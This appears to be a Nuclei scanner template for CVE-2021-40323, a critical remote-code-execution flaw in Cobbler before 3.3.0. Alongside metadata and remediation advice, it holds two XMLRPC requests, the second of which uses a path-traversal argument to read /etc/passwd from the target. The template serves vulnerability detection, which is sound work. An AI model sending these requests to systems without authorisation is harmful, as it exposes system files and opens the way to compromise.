id: CVE-2021-40323 info: name: Cobbler <3.3.0 - Remote Code Execution author: c-sh0 severity: critical description: Cobbler before 3.3.0 allows log poisoning and resultant remote code execution via an XMLRPC method. impact: | Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially resulting in complete compromise of the affected system. remediation: | Upgrade Cobbler to version 3.3.0 or later, which includes a fix for this vulnerability. reference: - https://github.com/cobbler/cobbler/releases/tag/v3.3.0 - https://github.com/cobbler/cobbler/issues/2795 - https://tnpitsecurity.com/blog/cobbler-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-40323 - https://github.com/cobbler/cobbler/commit/d8f60bbf14a838c8c8a1dba98086b223e35fe70a classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-40323 cwe-id: CWE-94 epss-score: 0.02948 epss-percentile: 0.89814 cpe: cpe:2.3:a:cobbler_project:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 2 vendor: cobbler_project product: cobbler tags: cve,cve2021,cobbler,rce,cobbler_project http: - raw: - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml find_profile name * - | POST {{BaseURL}}/cobbler_api HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml generate_script {{profile}} /etc/passwd matchers-condition: and matchers: - type: word part: header words: - 'text/xml' - type: regex regex: - "root:.*:0" - "bin:.*:1" - "nobody:.*:99" condition: or - type: status status: - 200 extractors: - type: regex name: profile group: 1 regex: - '(.*?)' internal: true # digest: 4b0a00483046022100945b9d84618c018b2b00fe680b7f727c88eff92333ab65f3429e24524cd2eba7022100aed59185f1f30d8bea1d8a47cdc0c40514e28993c75e1267d4dccd149fc2f892:922c64590222798bb761d5b6d8e72950